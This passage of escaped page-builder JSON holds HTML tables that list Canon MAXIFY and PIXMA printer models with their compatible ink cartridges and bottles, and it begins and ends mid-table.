align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td 